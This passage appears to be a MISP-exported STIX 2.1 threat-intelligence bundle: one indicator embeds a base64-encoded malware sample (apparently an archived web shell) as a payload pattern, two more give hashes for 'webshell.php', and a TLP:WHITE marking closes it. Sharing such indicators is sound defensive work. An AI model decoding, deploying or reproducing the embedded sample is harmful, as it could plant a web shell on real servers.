"pattern": "[file:content_ref.payload_bin = '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
"pattern_type": "stix",
"pattern_version": "2.1",
"valid_from": "2017-01-03T07:27:52Z",
"kill_chain_phases": [
{
"kill_chain_name": "misp-category",
"phase_name": "Payload delivery"
}
],
"labels": [
"misp:type=\"malware-sample\"",
"misp:category=\"Payload delivery\"",
"misp:to_ids=\"True\""
]
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--586b527a-c690-4f5a-a7b5-4a1e950d210f",
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
"created": "2017-01-03T07:27:54.000Z",
"modified": "2017-01-03T07:27:54.000Z",
"pattern": "[file:name = 'webshell.php' AND file:hashes.SHA1 = 'fd82bec721c32851806721b7ab25bbba3f957f49']",
"pattern_type": "stix",
"pattern_version": "2.1",
"valid_from": "2017-01-03T07:27:54Z",
"kill_chain_phases": [
{
"kill_chain_name": "misp-category",
"phase_name": "Payload delivery"
}
],
"labels": [
"misp:type=\"filename|sha1\"",
"misp:category=\"Payload delivery\"",
"misp:to_ids=\"True\""
]
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--586b527b-fb50-4977-9f99-4584950d210f",
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
"created": "2017-01-03T07:27:55.000Z",
"modified": "2017-01-03T07:27:55.000Z",
"pattern": "[file:name = 'webshell.php' AND file:hashes.SHA256 = '3367623638d42bdc1c45c44cb1843c00b510814170bc4e5da61eba2ddb212672']",
"pattern_type": "stix",
"pattern_version": "2.1",
"valid_from": "2017-01-03T07:27:55Z",
"kill_chain_phases": [
{
"kill_chain_name": "misp-category",
"phase_name": "Payload delivery"
}
],
"labels": [
"misp:type=\"filename|sha256\"",
"misp:category=\"Payload delivery\"",
"misp:to_ids=\"True\""
]
},
{
"type": "marking-definition",
"spec_version": "2.1",
"id": "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9",
"created": "2017-01-20T00:00:00.000Z",
"definition_type": "tlp",
"name": "TLP:WHITE",
"definition": {
"tlp": "white"
}
}
]
}